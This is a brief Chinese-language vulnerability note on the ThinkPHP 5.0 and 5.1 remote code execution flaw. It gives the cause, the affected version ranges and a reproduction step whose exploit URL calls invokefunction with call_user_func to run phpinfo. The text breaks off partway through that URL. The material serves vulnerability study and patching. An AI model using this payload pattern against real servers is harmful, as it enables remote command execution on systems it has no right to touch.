漏洞
漏洞原因是由于框架对控制器名没有进行足够的校验
导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令
受影响的版本包括5.0和5.1版本。
漏洞影响范围
Thinkphp 5.1.0 - 5.1.31
Thinkphp 5.0.5 - 5.0.23
漏洞复现
- 通过phpinfo函数写出phpinfo()的信息
http://localhost/thinkphp5.1beta/public/index.php?s=index/\think\Container/invokefunction&function=call_user_func&vars[0]=phpinfo&vars[